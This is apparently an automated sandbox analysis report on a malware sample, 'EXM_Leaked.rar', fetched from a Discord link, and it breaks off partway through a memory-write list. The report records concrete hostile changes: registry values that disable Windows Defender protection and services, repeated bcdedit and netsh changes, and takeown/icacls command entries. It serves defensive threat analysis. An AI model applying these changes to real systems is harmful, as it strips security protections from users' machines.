Analysis
-
max time kernel
273s -
max time network
280s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
02/03/2024, 23:03
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&
Resource
win10v2004-20240226-en
General
-
Target
https://cdn.discordapp.com/attachments/1122175843565842633/1181259340129243156/EXM_Leaked.rar?ex=65ef267d&is=65dcb17d&hm=19bc37788f94fff83e2b28d6138daaf56dfdeead71c7e143547b0cdea4af58d1&
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" reg.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 64 IoCs
pid Process 3796 bcdedit.exe 5352 bcdedit.exe 5284 bcdedit.exe 5364 bcdedit.exe 5700 bcdedit.exe 2160 bcdedit.exe 5160 bcdedit.exe 4048 bcdedit.exe 5132 bcdedit.exe 5208 bcdedit.exe 3000 bcdedit.exe 4732 bcdedit.exe 3536 bcdedit.exe 4604 bcdedit.exe 4260 bcdedit.exe 5824 bcdedit.exe 5268 bcdedit.exe 5204 bcdedit.exe 2812 bcdedit.exe 4800 bcdedit.exe 4760 bcdedit.exe 2600 bcdedit.exe 2244 bcdedit.exe 5828 bcdedit.exe 5888 bcdedit.exe 5708 bcdedit.exe 5908 bcdedit.exe 5948 bcdedit.exe 5936 bcdedit.exe 5996 bcdedit.exe 5912 bcdedit.exe 5968 bcdedit.exe 5976 bcdedit.exe 6012 bcdedit.exe 6040 bcdedit.exe 1948 bcdedit.exe 4748 bcdedit.exe 5812 bcdedit.exe 6068 bcdedit.exe 4560 bcdedit.exe 3280 bcdedit.exe 6092 bcdedit.exe 3192 bcdedit.exe 3788 bcdedit.exe 4828 bcdedit.exe 1188 bcdedit.exe 456 bcdedit.exe 1604 bcdedit.exe 6116 bcdedit.exe 3700 bcdedit.exe 1104 bcdedit.exe 3732 bcdedit.exe 6124 bcdedit.exe 5136 bcdedit.exe 5172 bcdedit.exe 4416 bcdedit.exe 2460 bcdedit.exe 5292 bcdedit.exe 1240 bcdedit.exe 2428 bcdedit.exe 5408 bcdedit.exe 3260 bcdedit.exe 1760 bcdedit.exe 5396 bcdedit.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3880 netsh.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 3 IoCs
pid Process 1736 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 5140 bound.exe -
Loads dropped DLL 18 IoCs
pid Process 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe 2812 Exm Ultra Version Leaked.exe -
Modifies system executable filetype association 2 TTPs 20 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\NoWorkingDirectory reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe -
resource yara_rule behavioral1/files/0x00070000000232eb-155.dat upx behavioral1/files/0x00070000000232eb-156.dat upx behavioral1/memory/2812-159-0x00007FF9D3730000-0x00007FF9D3B9E000-memory.dmp upx behavioral1/files/0x00070000000232e9-164.dat upx behavioral1/files/0x00070000000232b8-163.dat upx behavioral1/files/0x00070000000232ea-208.dat upx behavioral1/files/0x00070000000232e8-207.dat upx behavioral1/memory/2812-209-0x00007FF9E7750000-0x00007FF9E775F000-memory.dmp upx behavioral1/memory/2812-166-0x00007FF9E7970000-0x00007FF9E7994000-memory.dmp upx behavioral1/memory/2812-214-0x00007FF9E7720000-0x00007FF9E774D000-memory.dmp upx behavioral1/memory/2812-215-0x00007FF9E71E0000-0x00007FF9E71F9000-memory.dmp upx behavioral1/memory/2812-216-0x00007FF9E71C0000-0x00007FF9E71DF000-memory.dmp upx behavioral1/memory/2812-217-0x00007FF9D35C0000-0x00007FF9D3729000-memory.dmp upx behavioral1/memory/2812-218-0x00007FF9E71A0000-0x00007FF9E71B9000-memory.dmp upx behavioral1/memory/2812-219-0x00007FF9E7190000-0x00007FF9E719D000-memory.dmp upx behavioral1/memory/2812-220-0x00007FF9E7160000-0x00007FF9E718E000-memory.dmp upx behavioral1/memory/2812-221-0x00007FF9E6F50000-0x00007FF9E7008000-memory.dmp upx behavioral1/memory/2812-222-0x00007FF9D3730000-0x00007FF9D3B9E000-memory.dmp upx behavioral1/memory/2812-223-0x00007FF9D3240000-0x00007FF9D35B5000-memory.dmp upx behavioral1/memory/2812-227-0x00007FF9E70E0000-0x00007FF9E70F4000-memory.dmp upx behavioral1/memory/2812-225-0x00007FF9E7970000-0x00007FF9E7994000-memory.dmp upx behavioral1/memory/2812-228-0x00007FF9E6F40000-0x00007FF9E6F4D000-memory.dmp upx behavioral1/memory/2812-229-0x00007FF9D67A0000-0x00007FF9D68B8000-memory.dmp upx behavioral1/memory/2812-233-0x00007FF9E71E0000-0x00007FF9E71F9000-memory.dmp upx behavioral1/memory/2812-273-0x00007FF9D35C0000-0x00007FF9D3729000-memory.dmp upx behavioral1/memory/2812-272-0x00007FF9E71C0000-0x00007FF9E71DF000-memory.dmp upx behavioral1/memory/2812-275-0x00007FF9D3730000-0x00007FF9D3B9E000-memory.dmp upx behavioral1/memory/2812-276-0x00007FF9E7970000-0x00007FF9E7994000-memory.dmp upx behavioral1/memory/2812-277-0x00007FF9E7750000-0x00007FF9E775F000-memory.dmp upx behavioral1/memory/2812-278-0x00007FF9E7720000-0x00007FF9E774D000-memory.dmp upx behavioral1/memory/2812-280-0x00007FF9E71C0000-0x00007FF9E71DF000-memory.dmp upx behavioral1/memory/2812-281-0x00007FF9D35C0000-0x00007FF9D3729000-memory.dmp upx behavioral1/memory/2812-282-0x00007FF9E71A0000-0x00007FF9E71B9000-memory.dmp upx behavioral1/memory/2812-279-0x00007FF9E71E0000-0x00007FF9E71F9000-memory.dmp upx behavioral1/memory/2812-283-0x00007FF9E7190000-0x00007FF9E719D000-memory.dmp upx behavioral1/memory/2812-285-0x00007FF9E6F50000-0x00007FF9E7008000-memory.dmp upx behavioral1/memory/2812-284-0x00007FF9E7160000-0x00007FF9E718E000-memory.dmp upx behavioral1/memory/2812-286-0x00007FF9E71A0000-0x00007FF9E71B9000-memory.dmp upx behavioral1/memory/5124-288-0x000002CA1F010000-0x000002CA1F020000-memory.dmp upx behavioral1/memory/2812-291-0x00007FF9E6F40000-0x00007FF9E6F4D000-memory.dmp upx behavioral1/memory/2812-292-0x00007FF9D67A0000-0x00007FF9D68B8000-memory.dmp upx behavioral1/memory/2812-289-0x00007FF9E70E0000-0x00007FF9E70F4000-memory.dmp upx behavioral1/memory/2812-287-0x00007FF9D3240000-0x00007FF9D35B5000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" bound.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5168 sc.exe 5380 sc.exe 1240 sc.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 6060 timeout.exe 6104 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 5200 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
pid Process 5376 ipconfig.exe 5404 ipconfig.exe 5492 ipconfig.exe 4276 ipconfig.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\OptimizeWindowsSearchResultsForScreenReaders = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\NoWorkingDirectory reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\NoWorkingDirectory reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes\ShowSearchSuggestionsGlobal = "0" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\icon = "C:\\Windows\\system32\\imageres.dll ,73" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DoNotTrack = "1" reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\ = "Grant Admin Full Control" reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\EnableEncryptedMediaExtensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{2D8D44F7-5EB9-4D44-9815-5FF6266782D3} msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter\EnabledV9 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\command reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\runas2\ = "Grant Admin Full Control" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 5208 powershell.exe 5208 powershell.exe 5124 powershell.exe 5124 powershell.exe 5424 powershell.exe 5424 powershell.exe 5424 powershell.exe 5124 powershell.exe 5208 powershell.exe 2524 7zFM.exe 2524 7zFM.exe 3704 msedge.exe 3704 msedge.exe 4748 msedge.exe 4748 msedge.exe 5808 powershell.exe 5808 powershell.exe 5808 powershell.exe 4864 powershell.exe 4864 powershell.exe 4864 powershell.exe 1576 powershell.exe 1576 powershell.exe 1576 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2524 7zFM.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 3704 msedge.exe 3704 msedge.exe 3704 msedge.exe 3704 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2524 7zFM.exe Token: 35 2524 7zFM.exe Token: SeSecurityPrivilege 2524 7zFM.exe Token: SeDebugPrivilege 5200 tasklist.exe Token: SeIncreaseQuotaPrivilege 5192 WMIC.exe Token: SeSecurityPrivilege 5192 WMIC.exe Token: SeTakeOwnershipPrivilege 5192 WMIC.exe Token: SeLoadDriverPrivilege 5192 WMIC.exe Token: SeSystemProfilePrivilege 5192 WMIC.exe Token: SeSystemtimePrivilege 5192 WMIC.exe Token: SeProfSingleProcessPrivilege 5192 WMIC.exe Token: SeIncBasePriorityPrivilege 5192 WMIC.exe Token: SeCreatePagefilePrivilege 5192 WMIC.exe Token: SeBackupPrivilege 5192 WMIC.exe Token: SeRestorePrivilege 5192 WMIC.exe Token: SeShutdownPrivilege 5192 WMIC.exe Token: SeDebugPrivilege 5192 WMIC.exe Token: SeSystemEnvironmentPrivilege 5192 WMIC.exe Token: SeRemoteShutdownPrivilege 5192 WMIC.exe Token: SeUndockPrivilege 5192 WMIC.exe Token: SeManageVolumePrivilege 5192 WMIC.exe Token: 33 5192 WMIC.exe Token: 34 5192 WMIC.exe Token: 35 5192 WMIC.exe Token: 36 5192 WMIC.exe Token: SeDebugPrivilege 5124 powershell.exe Token: SeDebugPrivilege 5208 powershell.exe Token: SeDebugPrivilege 5424 powershell.exe Token: SeIncreaseQuotaPrivilege 5192 WMIC.exe Token: SeSecurityPrivilege 5192 WMIC.exe Token: SeTakeOwnershipPrivilege 5192 WMIC.exe Token: SeLoadDriverPrivilege 5192 WMIC.exe Token: SeSystemProfilePrivilege 5192 WMIC.exe Token: SeSystemtimePrivilege 5192 WMIC.exe Token: SeProfSingleProcessPrivilege 5192 WMIC.exe Token: SeIncBasePriorityPrivilege 5192 WMIC.exe Token: SeCreatePagefilePrivilege 5192 WMIC.exe Token: SeBackupPrivilege 5192 WMIC.exe Token: SeRestorePrivilege 5192 WMIC.exe Token: SeShutdownPrivilege 5192 WMIC.exe Token: SeDebugPrivilege 5192 WMIC.exe Token: SeSystemEnvironmentPrivilege 5192 WMIC.exe Token: SeRemoteShutdownPrivilege 5192 WMIC.exe Token: SeUndockPrivilege 5192 WMIC.exe Token: SeManageVolumePrivilege 5192 WMIC.exe Token: 33 5192 WMIC.exe Token: 34 5192 WMIC.exe Token: 35 5192 WMIC.exe Token: 36 5192 WMIC.exe Token: SeDebugPrivilege 5808 powershell.exe Token: SeIncreaseQuotaPrivilege 5808 powershell.exe Token: SeSecurityPrivilege 5808 powershell.exe Token: SeTakeOwnershipPrivilege 5808 powershell.exe Token: SeLoadDriverPrivilege 5808 powershell.exe Token: SeSystemProfilePrivilege 5808 powershell.exe Token: SeSystemtimePrivilege 5808 powershell.exe Token: SeProfSingleProcessPrivilege 5808 powershell.exe Token: SeIncBasePriorityPrivilege 5808 powershell.exe Token: SeCreatePagefilePrivilege 5808 powershell.exe Token: SeBackupPrivilege 5808 powershell.exe Token: SeRestorePrivilege 5808 powershell.exe Token: SeShutdownPrivilege 5808 powershell.exe Token: SeDebugPrivilege 5808 powershell.exe Token: SeSystemEnvironmentPrivilege 5808 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2524 7zFM.exe 2524 7zFM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3704 wrote to memory of 4928 3704 msedge.exe 119 PID 3704 wrote to memory of 4928 3704 msedge.exe 119 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 1664 3704 msedge.exe 120 PID 3704 wrote to memory of 4648 3704 msedge.exe 121 PID 3704 wrote to memory of 4648 3704 msedge.exe 121 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 msedge.exe 122 PID 3704 wrote to memory of 1088 3704 